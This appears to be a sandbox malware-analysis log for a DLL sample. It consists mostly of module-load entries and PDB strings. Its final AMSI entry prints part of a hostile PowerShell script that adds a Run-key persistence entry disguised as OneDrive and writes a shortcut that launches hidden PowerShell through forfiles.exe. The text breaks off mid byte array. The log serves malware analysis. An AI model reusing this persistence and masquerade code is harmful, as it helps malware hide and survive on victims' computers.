Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: napinsp.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: pnrpnsp.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshbth.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: nlaapi.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winrnr.dll | Jump to behavior |
Source: C:\Windows\System32\forfiles.exe | Section loaded: version.dll | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: schannel.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mskeyprotect.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncryptsslp.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: napinsp.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: pnrpnsp.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshbth.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: nlaapi.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winrnr.dll | |
Source: | Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbHF source: powershell.exe, 00000006.00000002.3080286160.00000276F9F8A000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: powershell.exe, 0000001C.00000002.3255522578.0000025E7DB16000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: 364e35\System.Management.Automation.pdbT source: powershell.exe, 0000000D.00000002.2517245546.00000278B4515000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb4Gm source: powershell.exe, 00000006.00000002.3080286160.00000276F9F8A000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\Microsoft.PowerShell.Commands.Utility.pdbh source: powershell.exe, 00000018.00000002.3206043710.00000223CF941000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\dll\mscorlib.pdb source: powershell.exe, 0000001C.00000002.3255522578.0000025E7DB16000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: 31bf3856ad364e35corlib.pdb source: powershell.exe, 0000001C.00000002.3255522578.0000025E7DB6C000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000007.00000002.3038134380.000002271A470000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3056953361.00000242CC694000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2517245546.00000278B456D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.3255522578.0000025E7DB6C000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: Microsoft.PowerShell.Commands.Utility.pdb6 source: powershell.exe, 00000006.00000002.2996314232.00000276F7C08000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: C:\Windows\mscorlib.pdbpdblib.pdbR source: powershell.exe, 0000000D.00000002.2517245546.00000278B456D000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: C:\Windows\Microsoft.PowerShell.Commands.Utility.pdbpdbity.pdb^ source: powershell.exe, 00000007.00000002.3027895006.000002271A196000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: CallSite.Target.pdbz* source: powershell.exe, 00000008.00000002.3043110915.00000242CC60D000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: ws\System.Management.Automation.pdbpdb source: powershell.exe, 00000018.00000002.3196743622.00000223CF913000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: softy.pdb# source: powershell.exe, 00000018.00000002.3188775271.00000223CF58E000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000006.00000002.3069004081.00000276F9F1A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2517245546.00000278B4515000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.3255522578.0000025E7DB16000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\System.Management.Automation.pdbpdb source: powershell.exe, 00000006.00000002.3052251366.00000276F9CE1000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2516637962.00000278B42A2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.3255522578.0000025E7DB6C000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdbX source: powershell.exe, 00000018.00000002.3206043710.00000223CF941000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: System.Management.Automationib.pdb source: powershell.exe, 00000008.00000002.2572094402.00000242B23BB000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: C:\Windows\Microsoft.PowerShell.Commands.Utility.pdbpdbity.pdbs source: powershell.exe, 00000008.00000002.2572094402.00000242B2414000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000006.00000002.3039134768.00000276F9C85000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000006.00000002.3069004081.00000276F9F1A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.3196743622.00000223CF87E000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32x source: powershell.exe, 0000000D.00000002.2517245546.00000278B456D000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\mscorlib.pdb source: powershell.exe, 00000006.00000002.3069004081.00000276F9F1A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.3255522578.0000025E7DB6C000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: ib.pdb source: powershell.exe, 00000007.00000002.3011907494.000002271A12A000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb91? source: powershell.exe, 00000008.00000002.3009488482.00000242CC320000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: ws\dll\mscorlib.pdbe source: powershell.exe, 0000000D.00000002.2517245546.00000278B456D000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: C:\Windows\Microsoft.PowerShell.Commands.Utility.pdbpdbity.pdb89 source: powershell.exe, 0000000D.00000002.2516637962.00000278B42A2000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: C:\Users\Bill Hillman\source\repos\prohashingDLL\x64\Release\prohashingDLL.pdb source: HQsitBLlOv.dll |
Source: | Binary string: \??\C:\Windows\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000018.00000002.3206043710.00000223CF941000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: n.pdbI3 source: powershell.exe, 0000000D.00000002.2518172369.00000278B45AC000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb_` source: powershell.exe, 0000001C.00000002.3255522578.0000025E7DB16000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: softy.pdb source: powershell.exe, 00000007.00000002.3011907494.000002271A12A000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbC:\W source: powershell.exe, 0000001C.00000002.3255522578.0000025E7DB6C000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: softy.pdb^ source: powershell.exe, 0000001C.00000002.3251820933.0000025E7D948000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: n.pdb source: powershell.exe, 00000006.00000002.3081283774.00000276F9F9D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.3206043710.00000223CF941000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.3255522578.0000025E7DB16000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\dll\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000006.00000002.3052251366.00000276F9CE1000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbata\ source: powershell.exe, 0000001C.00000002.3255522578.0000025E7DB6C000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb source: powershell.exe, 00000018.00000002.3206043710.00000223CF941000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 0000001C.00000002.3251820933.0000025E7D948000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: b.pdb source: powershell.exe, 00000008.00000002.3043110915.00000242CC60D000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\Servererver32 source: powershell.exe, 0000001C.00000002.3250944670.0000025E7D907000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: ement.Automation.pdbt source: powershell.exe, 0000000D.00000002.2517245546.00000278B456D000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: -C:\Users\Bill Hillman\source\repos\prohashingDLL\x64\Release\prohashingDLL.pdb source: HQsitBLlOv.dll |
Source: | Binary string: rlib.pdb source: powershell.exe, 00000008.00000002.3043110915.00000242CC666000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: Microsoft.PowerShell.Commands.Utility.pdb9$M source: powershell.exe, 00000007.00000002.3038134380.000002271A470000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000007.00000002.3038134380.000002271A4B5000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: scorlib.pdbpdblib.pdb source: powershell.exe, 00000006.00000002.3069004081.00000276F9F75000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: C:\Windows\Microsoft.PowerShell.Commands.Utility.pdbpdbity.pdbe089Z source: powershell.exe, 00000018.00000002.3192927958.00000223CF610000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.3039134768.00000276F9C35000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2516094783.00000278B4203000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.3196743622.00000223CF86D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.3255522578.0000025E7DB16000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.3255522578.0000025E7DAEF000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: n.pdb!3 source: powershell.exe, 0000000D.00000002.2518172369.00000278B45AC000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: mscorlib.pdb source: powershell.exe, 00000006.00000002.3039134768.00000276F9C35000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3038134380.000002271A470000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.3255522578.0000025E7DAEF000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000006.00000002.3039134768.00000276F9C85000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbH$- source: powershell.exe, 00000006.00000002.3052251366.00000276F9CE1000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: C:\Windows\mscorlib.pdbpdblib.pdbrS source: powershell.exe, 00000018.00000002.3196743622.00000223CF8EC000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: n.pdbjk source: powershell.exe, 00000006.00000002.3081283774.00000276F9F9D000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: softy.pdb9dll source: powershell.exe, 0000000D.00000002.2516637962.00000278B42A2000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: ws\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.3052251366.00000276F9CE1000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb` source: powershell.exe, 00000006.00000002.3081283774.00000276F9F9D000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: softy.pdbB source: powershell.exe, 00000008.00000002.3009488482.00000242CC320000.00000004.00000020.00020000.00000000.sdmp |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: .lnk" -Forcesleep 5$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {rm $env:tmp\onedrivefilesync.dll -forceNew-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "OneDrive File Sync" -Value '"C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"' -PropertyType String -Forcemkdir "C:\ProgramData\Microsoft OneDrive\FileSync";$savedbytes = (76,0,0,0,1,20,2,0,0,0,0,0,192,0,0,0,0,0,0,70,171,0,8,0,32,0,0,0,124,37,104,27,210,97,216,1,203,131,156,28,20,3,219,1,124,37,104,27,210,97,216,1,0,16,1,0,0,0,0,0,7,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,69,1,20,0,31,80,224,79,208,32,234,58,105,16,162,216,8,0,43,48,48,157,25,0,47,67,58,92,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,86,0,49,0,0,0,0,0,23,89,186,133,48,0,87,105,110,100,111,119,115,0,64,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,246,25,0,0,0,0,2,0,0,0,0,0,12,1,0,0,0,0,0,0,0,0,46,238,28,1,87,0,105,0,110,0,100,0,111,0,119,0,115,0,0,0,22,0,90,0,49,0,0,0,0,0,36,89,104,183,16,0,83,121,115,116,101,109,51,50,0,0,66,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,76,95,0,0,0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,208,173,33,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,0,0,24,0,102,0,50,0,0,16,1,0,167,84,130,42,32,0,102,111,114,102,105,108,101,115,46,101,120,101,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,0,0,0,85,0,0,0,24,0,0,0,3,0,0,0,96,56,18,250,16,0,0,0,87,105,110,100,111,119,115,0,67,58,92,87,105,110,100,111,119,115,92,83,121,115,116,101,109,51,50,92,102,111,114,102,105,108,101,115,46,101,120,101,0,0,38,0,46,0,46,0,92,0,46,0,46,0,92,0,46,0,46,0,92,0,87,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,92,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,215,0,47,0,112,0,32,0,99,0,58,0,92,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,115,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,32,0,47,0,109,0,32,0,110,0,111,0,116,0,101,0,112,0,97,0,100,0,46,0,101,0,120,0,101,0,32,0,47,0,99,0,32,0,34,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,46,0,101,0,120,0,101,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,32,0,45,0,119,0,105,0,110,0,100,0,111,0,119,0,115, |